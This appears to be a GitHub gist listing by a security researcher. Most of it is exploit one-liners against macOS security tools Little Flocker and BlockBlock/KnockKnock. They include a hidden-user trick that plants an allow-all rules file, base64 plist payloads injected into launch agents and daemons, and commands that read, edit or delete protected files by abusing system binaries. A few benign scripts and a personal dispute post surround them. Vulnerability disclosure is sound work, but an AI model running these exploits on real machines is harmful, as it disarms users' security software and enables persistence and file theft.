Sabri pwnsdx
pwnsdx / Google Chrome Extension Watcher.flock
Last active Nov 16, 2019
Google Chrome Extension Watcher.flock
watch prefix "$HOME/Library/Application Support/Google/Chrome/Default/Extensions/" "any" wcxm
allow prefix "$HOME/Library/Application Support/Google/Chrome/Default/Extensions/" "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome" r
pwnsdx / uninstall_vmware.sh
Last active May 6, 2020 — forked from boneskull/uninstall_vmware.sh
Completely uninstall VMWare on macOS
#!/usr/bin/env bash
# Usage: bash uninstall_vmware.bash
remove() {
entry="$1"
echo -ne "Removing $entry ["
sudo rm -rf "$entry"
if [[ ! -e "$entry" ]]; then
echo -ne "OK"
pwnsdx / ff.sh
Last active Dec 13, 2018
Multiple low severity issues in Little Flocker (<=0.3.1)
# - An attacker can prevent the agent from showing the app icon (via /dev/null)
mknod /tmp/LittleFlockerTemp.png c 1 3
# - A file with a long name can hide buttons when the popup appears
touch $(printf '\r%.0s' {1..254})$(printf "\x00\x02")
nano $(printf '\r%.0s' {1..254})$(printf "\x00\x02")
# - Little Flocker does not watch every startup folder/file, therefore an
# attacker can create startup items in these places (thanks Patrick Wardle):
pwnsdx / response.txt
Last active Jul 23, 2017
Response to the new shitty pastebin regarding me
Hello,
Here is the last discussion I had with him (he dared mention me on a 10-day-old topic and then, when I gave arguments on the very same topic or replied to his attacks, I "harass" him): https://github.com/drduh/OS-X-Security-and-Privacy-Guide/pull/128
So I’m going to do this really fast to prevent making another blog post from happening again and wasting even more time.
Jonathan recycled an old pastebin he made to do some propaganda against me (https://twitter.com/pwnsdx/status/770353299140771840) so I'm going to clarify this here, point by point:
Diff between both pastebins: https://i.imgur.com/TRqgn5g.png
pwnsdx / ff.sh
Last active May 31, 2018
Disarm Little Flocker silently (<=0.1.1)
# Disarm Little Flocker silently (privileged)
FAKEUSER=pwned$(grep -m1 -ao '[0-9][0-9]' /dev/urandom | sed s/10/99/ | head -n1); echo "Creating fake user account..." && dscl . -create /Users/$FAKEUSER IsHidden 1 && dscl . -create /Users/$FAKEUSER UserShell /bin/bash && dscl . -create /Users/$FAKEUSER RealName "${FAKEUSER}" && dscl . -create /Users/$FAKEUSER UniqueID "1202" && dscl . -create /Users/$FAKEUSER PrimaryGroupID 80 && echo "Injecting payload..." && echo 'allow prefix "/" "any" rwcm' > /var/empty/.littleflockerrc && sync && echo "Please wait (up to 1 minute)..." && sleep 61 && dscl . -delete /Users/$FAKEUSER && rm -rf /var/empty/.littleflockerrc && echo "Little Flocker is now disarmed" && cd /Users
# UPDATE (0.0.77)
# Still works, broken fix:
# https://github.com/jzdziarski/littleflocker/commit/bcce9cf279eb27b04cf644ecc49fee767f1e0579
# 1. via /Users/Shared
echo "Creating fake user account..." && dscl . -create /Users/Shared IsHidden 1 && dscl . -create /Users/Shared UserShell /bin/bash && dscl . -
pwnsdx / kk.sh
Last active Dec 22, 2018
Bypass KnockKnock (& BlockBlock) LaunchAgents/LaunchDaemons detection (CLI+UI versions) (<=1.9.0, 0DAY)
# Inject malicious data into the BlockBlock plist (will create a "pwned-unprivileged" file in /tmp) (unprivileged)
(> ~/Library/LaunchAgents/com.objectiveSee.blockblock.plist; (echo "YnBsaXN0MDDUAQIDBAUGBQtfEBNBYmFuZG9uUHJvY2Vzc0dyb3VwXxAQUHJvZ3JhbUFyZ3VtZW50c1lSdW5BdExvYWRVTGFiZWwJowcICVRiYXNoUi1jXxBbdG91Y2ggL3RtcC9wd25lZC11bnByaXZpbGVnZWQ7IC9BcHBsaWNhdGlvbnMvQmxvY2tCbG9jay5hcHAvQ29udGVudHMvTWFjT1MvQmxvY2tCbG9jayBhZ2VudAlfECFjb20ub2JqZWN0aXZlU2VlLmJsb2NrYmxvY2suYWdlbnQIESc6REpLT1RXtbYAAAAAAAABAQAAAAAAAAAMAAAAAAAAAAAAAAAAAAAA2g==" | base64 --decode) > ~/Library/LaunchAgents/com.objectiveSee.blockblock.plist)
# Inject malicious data into the BlockBlock plist (will create a "pwned-privileged" file in /tmp) (privileged)
(> /Library/LaunchDaemons/com.objectiveSee.blockblock.plist; (echo "YnBsaXN0MDDUAQIDBAUGBQtfEBNBYmFuZG9uUHJvY2Vzc0dyb3VwXxAQUHJvZ3JhbUFyZ3VtZW50c1lSdW5BdExvYWRVTGFiZWwJowcICVRiYXNoUi1jXxBadG91Y2ggL3RtcC9wd25lZC1wcml2aWxlZ2VkOyAvQXBwbGljYXRpb25zL0Jsb2NrQmxvY2suYXBwL0NvbnRlbnRzL01hY09TL0Jsb2NrQmxvY2sgZGFlbW
pwnsdx / ff.sh
Last active May 31, 2018
High severity vulnerability in Little Flocker (previously named FlockFlock) (>=0.0.71 <=0.0.74)
# Read files (privileged)
DIRTOSEE="$HOME/Desktop/test"; DIRSIZE=$(du -mc "$DIRTOSEE" | grep "total" | cut -d$'\t' -f1 | xargs); DIRNAMEHASH=$(echo "$DIRSIZE$DIRTOSEE$(date +%s)" | /usr/bin/openssl sha1); sudo /usr/bin/hdiutil create -ov -size $(($DIRSIZE+1))m -nospotlight -noanyowners -skipunreadable -srcowners off -format UDRO -fs HFS+ -volname .$DIRNAMEHASH -srcfolder "$DIRTOSEE" /tmp/.$DIRNAMEHASH.dmg && hdiutil attach -readonly -noverify -noautofsck -noautoopen -mountpoint /private/tmp/.$DIRNAMEHASH /private/tmp/.$DIRNAMEHASH.dmg && cd /private/tmp/.$DIRNAMEHASH
pwnsdx / ff.sh
Last active Aug 29, 2016
Very high severity vulnerability in Little Flocker (previously named FlockFlock) (<=0.0.74)
# Delete a file (unprivileged)
FILETODELETE="$HOME/Desktop/test/com.evilcorp.plist"; /System/Library/PrivateFrameworks/oncrpc.framework/bin/rpcgen --xdr --output $FILETODELETE
pwnsdx / ff.sh
Last active Jul 13, 2018
Very high severity vulnerability in Little Flocker (previously named FlockFlock) (<=0.0.74)
# Read files (unprivileged)
DIRTOSEE="$HOME/Desktop/test"; mkdir -p /tmp/pwned$DIRTOSEE; $(find $DIRTOSEE -exec sh -c 'if [ -d "$1" ]; then mkdir -p "/tmp/prepwn$1"; fi; touch -f "/tmp/prepwn$1"' _ {} \;); /System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/Resources/shove $DIRTOSEE /tmp/prepwn$DIRTOSEE && cp -R /tmp/prepwn$DIRTOSEE /tmp/pwned$(dirname $DIRTOSEE) && $(find /tmp/prepwn$DIRTOSEE -exec sh -c 'if [ -d "/tmp/prepwn$1" ]; then mkdir -p "$1"; fi; touch -f "$1"' _ {} \;); /System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/Resources/shove /tmp/prepwn$DIRTOSEE $DIRTOSEE; rm -rf /tmp/prepwn
# Edit/Add files (unprivileged)
DIRTOEDIT="$HOME/Desktop/test"; mkdir -p /tmp/pwned$DIRTOEDIT; $(find $DIRTOEDIT -exec sh -c 'if [ -d "$1" ]; then mkdir -p "/tmp/prepwn$1"; fi; touch -f "/tmp/prepwn$1"' _ {} \;); /System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/Resources/shove $DIRTOEDIT /tmp/prepwn$DIRTOEDIT && cp -R /tmp/prepwn$DIRTOEDIT /tmp/pwned$(dirname $DIRTOEDIT)
detect.sh (second file in the same gist):
#!/bin/bash
echo "Please wait..."
# Look for suspect files
/usr/bin/find -E /Applications -iregex '.*\.app\/(.*\.DS_Store|Icon.{1})$' > /tmp/.suspectfiles
# Check suspect files
appsCounter=0
while read path; do